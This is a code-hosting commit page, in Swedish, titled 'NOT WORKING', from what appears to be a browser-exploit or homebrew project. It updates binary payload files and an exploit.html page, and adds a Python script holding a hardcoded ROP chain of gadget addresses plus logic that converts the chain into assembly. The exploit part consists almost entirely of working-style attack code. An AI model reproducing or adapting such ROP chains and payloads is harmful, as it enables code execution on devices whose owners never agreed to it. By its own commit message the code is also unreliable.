Bläddra i källkod

NOT WORKING

pull/2/head
Winbagility 2 år sedan
förälder
incheckning
e5f1d8658c
4 ändrade filer med 9 tillägg och 3 borttagningar
  1. Binär
      payload/boot.elf
  2. Binär
      payload/boot_.elf
  3. 2
    2
      payload/exploit.html
  4. 7
    1
      ropChainToAsm.py

Binär
payload/boot.elf Visa fil


Binär
payload/boot_.elf Visa fil


+ 2
- 2
payload/exploit.html
Filskillnaden har hållits tillbaka eftersom den är för stor
Visa fil


+ 7
- 1
ropChainToAsm.py Visa fil

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size

Laddar…
Avbryt
Spara